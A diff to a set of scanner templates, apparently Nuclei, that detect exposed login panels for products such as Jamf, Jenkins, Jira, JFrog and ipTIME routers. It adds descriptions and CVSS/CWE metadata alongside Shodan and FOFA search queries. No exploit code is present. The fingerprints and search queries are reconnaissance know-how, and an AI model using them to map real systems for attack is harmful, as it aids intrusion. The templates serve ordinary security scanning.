words:
- "iomega"
part: header
# Enhanced by md on 2022/11/21


@ -1,9 +1,14 @@
id: ipdiva-mediation-panel
info:
name: IPdiva Mediation Panel Detect
name: IPdiva Mediation Login Panel - Detect
author: ritikchaddha
severity: info
description: IPdiva Mediation login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true
shodan-query: http.html:"IPdiva"
@ -30,3 +35,5 @@ requests:
part: body
words:
- "IPdiva Secure"
# Enhanced by md on 2022/11/21


@ -1,11 +1,16 @@
id: iptime-router
info:
name: ipTIME Router Login
name: ipTIME Router Login Panel - Detect
author: gy741
severity: info
description: ipTIME router login panel was detected.
reference:
- http://pierrekim.github.io/blog/2015-07-01-poc-with-RCE-against-127-iptime-router-models.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
tags: panel,login,iptime,router
requests:
@ -29,3 +34,5 @@ requests:
group: 1
regex:
- <TITLE>ipTIME ([A-Z0-9_-]+)<\/TITLE>
# Enhanced by md on 2022/11/21


@ -1,9 +1,14 @@
id: issabel-login
info:
name: Issabel Login Panel
name: Issabel Login Panel - Detect
author: pikpikcu
severity: info
description: Issabel login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
fofa-query: title="Issabel"
tags: issabel,panel
@ -25,3 +30,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/11/21


@ -1,9 +1,14 @@
id: istat-panel-detect
info:
name: i-STAT Panel Detect
name: Abbott i-STAT Login Panel - Detect
author: princechaddha
severity: info
description: Abbott i-STAT login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
tags: panel,abbott,istat
requests:
@ -21,3 +26,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/11/21


@ -1,10 +1,14 @@
id: itop-panel
info:
name: iTop Instance Detection Template
name: Combodo iTop Login Panel - Detect
author: righettod
severity: info
description: Try to detect the presence of a Combodo iTop instance via the login page
description: Combodo iTop login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
tags: panel,itop
requests:
@ -24,4 +28,6 @@ requests:
- type: status
status:
- 200
- 200
# Enhanced by md on 2022/11/21


@ -1,9 +1,14 @@
id: ixbusweb-panel
info:
name: iXBusWeb Panel Detect
name: iXBus Login Panel - Detect
author: Podalirius
severity: info
description: iXBus login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
shodan-query: http.title:"iXBus"
tags: panel,ixbusweb,cms
@ -29,3 +34,5 @@ requests:
group: 2
regex:
- '(iXBusWeb[\n\t ]+\((([0-9]+(.[0-9]+)?(.[0-9]+)?(.[0-9]+)?))\))'
# Enhanced by md on 2022/11/21


@ -1,11 +1,16 @@
id: ixcache-panel
info:
name: iXCache Panel Detect
name: iXCache Login Panel - Detect
author: ffffffff0x
severity: info
description: iXCache login panel was detected.
reference:
- https://www.panabit.com/cn/product/iXCache/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
fofa-query: app="iXCache"
tags: ixcache,panel
@ -27,3 +32,5 @@ requests:
- type: status
status:
- 302
# Enhanced by md on 2022/11/21


@ -1,9 +1,14 @@
id: jamf-login
info:
name: Jamf Pro Login
name: Jamf Pro Login Panel - Detect
author: DhiyaneshDk
severity: info
description: Jamf Pro login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true
shodan-query: title:"Jamf Pro"
@ -25,3 +30,5 @@ requests:
- type: status
status:
- 401
# Enhanced by md on 2022/11/21


@ -1,9 +1,14 @@
id: jamf-panel
info:
name: JAMF MDM Panel
name: Jamf MDM Login Panel - Detect
author: pdteam,idealphase
severity: info
description: Jamf Mobile Device Management login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
shodan-query: http.favicon.hash:1262005940
tags: jamf,panel,mdm
@ -30,3 +35,5 @@ requests:
group: 1
regex:
- '<meta name=\"version\" content=\"(.*)\">'
# Enhanced by md on 2022/11/21


@ -1,9 +1,14 @@
id: jamf-setup-assistant
info:
name: Jamf Pro Setup Assistant
name: Jamf Pro Setup Assistant Panel - Detect
author: ritikchaddha
severity: info
description: Jamf Pro Setup Assistant panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true
shodan-query: http.html:"Jamf Pro Setup"
@ -23,3 +28,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/11/21


@ -1,9 +1,14 @@
id: jaspersoft-panel
info:
name: Jaspersoft Panel Login
name: TIBCO Jaspersoft Login Panel - Detect
author: koti2,daffainfo
severity: info
description: TIBCO Jaspersoft login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
shodan-query: http.title:"Jaspersoft"
tags: panel,jaspersoft
@ -27,3 +32,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/11/21


@ -1,9 +1,14 @@
id: jeedom-panel
info:
name: Jeedom Login Panel
name: Jeedom Login Panel - Detect
author: pikpikcu,daffainfo
severity: info
description: Jeedom login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
shodan-query: http.title:"Jeedom"
tags: panel,jeedom,login
@ -25,3 +30,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/11/21


@ -1,10 +1,14 @@
id: jenkins-api-panel
info:
name: Jenkins API Instance Detection Template
name: Jenkins API Panel - Detect
author: righettod
severity: info
description: Try to detect the presence of a Jenkins API instance via the API default XML endpoint
description: Jenkins API panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
tags: panel,api,jenkins
requests:
@ -20,4 +24,6 @@ requests:
- type: status
status:
- 200
- 200
# Enhanced by md on 2022/11/21


@ -1,11 +1,16 @@
id: jfrog-login
info:
name: JFrog Login
name: JFrog Login Panel - Detect
author: dhiyaneshDK
severity: info
description: JFrog login panel was detected.
reference:
- https://www.exploit-db.com/ghdb/6797
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
tags: panel,jfrog,edb
requests:
@ -21,3 +26,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/11/21


@ -1,9 +1,14 @@
id: jira-detect
info:
name: Detect Jira Issue Management Software
name: Jira Login Panel - Detect
author: pdteam,philippedelteil
severity: info
description: Jira login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
tags: panel,jira
requests:
@ -27,3 +32,5 @@ requests:
group: 1
regex:
- 'title="JiraVersion" value="([0-9.]+)'
# Enhanced by md on 2022/11/21
